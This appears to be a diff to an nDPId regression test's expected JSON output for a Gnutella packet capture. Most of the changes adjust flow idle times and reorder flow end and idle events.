+00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":61974,"flow_last_seen":149634,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"207.38.163.228","src_port":50191,"dst_port":6778,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00557{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":61974,"flow_last_seen":149634,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"207.38.163.228","src_port":50191,"dst_port":6778,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00569{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":89829,"flow_last_seen":174528,"flow_idle_time":180000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3570,"flow_avg_l4_payload_len":357,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"181.84.178.16","src_port":28681,"dst_port":60262,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00570{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":95264,"flow_last_seen":176255,"flow_idle_time":180000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4383,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"47.220.186.140","src_port":28681,"dst_port":27641,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00569{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":90005,"flow_last_seen":243646,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4494,"flow_avg_l4_payload_len":321,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.120.73.215","src_port":28681,"dst_port":24562,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -2640,8 +2640,6 @@ 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":139669,"flow_last_seen":139669,"flow_idle_time":180000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"47.224.174.174","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":139506,"flow_last_seen":139506,"flow_idle_time":180000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"98.35.85.238","src_port":28681,"dst_port":32173,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":139506,"flow_last_seen":139506,"flow_idle_time":180000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"98.35.85.238","src_port":28681,"dst_port":32173,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":71204,"flow_last_seen":193763,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.62.225.181","src_port":50245,"dst_port":46843,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00558{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":71204,"flow_last_seen":193763,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.62.225.181","src_port":50245,"dst_port":46843,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00583{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":95784,"flow_last_seen":139896,"flow_idle_time":180000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1616,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"173.183.183.110","src_port":28681,"dst_port":59920,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00568{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":95784,"flow_last_seen":139896,"flow_idle_time":180000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1616,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"173.183.183.110","src_port":28681,"dst_port":59920,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00582{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":4964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":95715,"flow_last_seen":139730,"flow_idle_time":180000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":2424,"flow_avg_l4_payload_len":404,"midstream":0,"thread_ts_msec":313025,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.132.188.98","src_port":28681,"dst_port":62851,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -2701,6 +2699,8 @@ 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":562,"flow_packet_id":2,"flow_last_seen":320292,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":320292,"pkt":"UlQAEjUCCAAn5uVZCABFAAA4CAEAAIARw78KAAIPcHfybnAJ6ecAJJt6ZMkxArsJiWn\/2NtEIIr3AwABAAUAAADDglFLQA=="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5065,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":664,"flow_packet_id":2,"flow_last_seen":320293,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":320293,"pkt":"UlQAEjUCCAAn5uVZCABFAAA4sK0AAIARXRsKAAIPMjruo3AJGcIAJO3IbAsxAnYtXYL\/8bz\/pBe7AwABAAUAAADDglFLQA=="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5066,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":696,"flow_packet_id":2,"flow_last_seen":320293,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":320293,"pkt":"UlQAEjUCCAAn5uVZCABFAAA419wAAIARwSYKAAIPTL1I5nAJH+EAJBtk6eoxAtFG13r\/NLEu9DR8AwABAAUAAADDglFLQA=="} +00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":5096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":71204,"flow_last_seen":193763,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":323187,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.62.225.181","src_port":50245,"dst_port":46843,"l4_proto":"tcp","ndpi": 
{"proto":"Unknown","breed":"Unrated"}} +00558{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5096,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":71204,"flow_last_seen":193763,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":323187,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.62.225.181","src_port":50245,"dst_port":46843,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":5204,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":89967,"flow_last_seen":152618,"flow_idle_time":180000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":333448,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.203.218.92","src_port":28681,"dst_port":56962,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5204,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":89967,"flow_last_seen":152618,"flow_idle_time":180000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":333448,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.203.218.92","src_port":28681,"dst_port":56962,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":5204,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":89966,"flow_last_seen":152619,"flow_idle_time":180000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":333448,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.88.117.218","src_port":28681,"dst_port":6909,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -3927,8 +3927,8 @@ 01485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7488,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":799,"flow_packet_id":2,"flow_last_seen":599529,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":834,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":834,"pkt_l4_len":780,"thread_ts_msec":599529,"pkt":"MzMAAAAMCAAn5uVZht1gB0PFAwwRAf6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAAAM+dYOdgMMdjk8P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJ1dGYtOCI\/Pjxzb2FwOkVudmVsb3BlIHhtbG5zOnNvYXA9Imh0dHA6Ly93d3cudzMub3JnLzIwMDMvMDUvc29hcC1lbnZlbG9wZSIgeG1sbnM6d3NhPSJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA0LzA4L2FkZHJlc3NpbmciIHhtbG5zOndzZD0iaHR0cDovL3NjaGVtYXMueG1sc29hcC5vcmcvd3MvMjAwNS8wNC9kaXNjb3ZlcnkiPjxzb2FwOkhlYWRlcj48d3NhOlRvPnVybjpzY2hlbWFzLXhtbHNvYXAtb3JnOndzOjIwMDU6MDQ6ZGlzY292ZXJ5PC93c2E6VG8+PHdzYTpBY3Rpb24+aHR0cDovL3NjaGVtYXMueG1sc29hcC5vcmcvd3MvMjAwNS8wNC9kaXNjb3ZlcnkvQnllPC93c2E6QWN0aW9uPjx3c2E6TWVzc2FnZUlEPnVybjp1dWlkOjk4Zjc0ZjcxLTZkZmMtNDYxMi05YzNjLTVjNTgwZWI4MzU5Njwvd3NhOk1lc3NhZ2VJRD48d3NkOkFwcFNlcXVlbmNlIEluc3RhbmNlSWQ9IjQ2IiBTZXF1ZW5jZUlkPSJ1cm46dXVpZDo3NjczODllMC1lZTlhLTRjMWMtYjkwMi0yMGNiODFkMjAzZTAiIE1lc3NhZ2VOdW1iZXI9IjUiPjwvd3NkOkFwcFNlcXVlbmNlPjwvc29hcDpIZWFkZXI+PHNvYXA6Qm9keT48d3NkOkJ5ZT48d3NhOkVuZHBvaW50UmVmZXJlbmNlPjx3c2E6QWRkcmVzcz51cm46dXVpZDo3NDdmM2Q5Ni02OGE3LTQzZjEtOGNiZS1lOGQ2ZGFkZDAzNTg8L3dzYTpBZGRyZXNzPjwvd3NhOkVuZHBvaW50UmVmZXJlbmNlPjwvd3NkOkJ5ZT48L3NvYXA6Qm9keT48L3NvYXA6RW52ZWxvcGU+"} 
00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7489,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":801,"flow_packet_id":2,"flow_last_seen":599747,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":90,"pkt_l4_len":28,"thread_ts_msec":599747,"pkt":"MzMAAAAWCAAn5uVZht1gAAAAACQAAf6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAAAWOgAFAgAAAQCPAOKkAAAAAQMAAAD\/AgAAAAAAAAAAAAAAAAAM"} 00567{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":7490,"source":"gnutella.pcap","alias":"nDPId-test","packets-captured":7490,"packets-processed":7468,"total-skipped-flows":0,"total-l4-data-len":3617715,"total-not-detected-flows":547,"total-guessed-flows":4,"total-detected-flows":98,"total-detection-updates":3,"total-updates":290,"current-active-flows":169,"total-active-flows":801,"total-idle-flows":632,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":3929,"global_ts_msec":600247} -00570{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":65062,"flow_last_seen":74093,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"95.17.124.40","src_port":50212,"dst_port":6776,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00555{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":65062,"flow_last_seen":74093,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"95.17.124.40","src_port":50212,"dst_port":6776,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00570{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":65062,"flow_last_seen":74093,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"95.17.124.40","src_port":50212,"dst_port":6776,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00555{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":65062,"flow_last_seen":74093,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"95.17.124.40","src_port":50212,"dst_port":6776,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":751,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":312956,"flow_last_seen":493286,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"67.193.8.52","src_port":28681,"dst_port":38584,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":751,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":312956,"flow_last_seen":493286,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"67.193.8.52","src_port":28681,"dst_port":38584,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00575{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":72852,"flow_last_seen":431829,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"78.231.73.14","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -3945,22 +3945,22 @@ 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":82062,"flow_last_seen":491979,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"91.172.15.182","src_port":28681,"dst_port":37829,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00575{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":71540,"flow_last_seen":551891,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.23.75.69","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00560{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":71540,"flow_last_seen":551891,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.23.75.69","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":89733,"flow_last_seen":98763,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"74.195.236.249","src_port":50289,"dst_port":18557,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":89733,"flow_last_seen":98763,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"74.195.236.249","src_port":50289,"dst_port":18557,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":89733,"flow_last_seen":98763,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"74.195.236.249","src_port":50289,"dst_port":18557,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":89733,"flow_last_seen":98763,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"74.195.236.249","src_port":50289,"dst_port":18557,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":800,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":599415,"flow_last_seen":599415,"flow_idle_time":180000,"flow_min_l4_payload_len":772,"flow_max_l4_payload_len":772,"flow_tot_l4_payload_len":772,"flow_avg_l4_payload_len":772,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63957,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} 00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":776,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490660,"flow_last_seen":551702,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.85.10.83","src_port":28681,"dst_port":8797,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":776,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":490660,"flow_last_seen":551702,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.85.10.83","src_port":28681,"dst_port":8797,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":85607,"flow_last_seen":94638,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.179.18.242","src_port":50273,"dst_port":47329,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":85607,"flow_last_seen":94638,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.179.18.242","src_port":50273,"dst_port":47329,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"finished","flow_packets_processed":135,"flow_first_seen":90742,"flow_last_seen":593652,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":9771,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.61.52.183","src_port":50300,"dst_port":11852,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 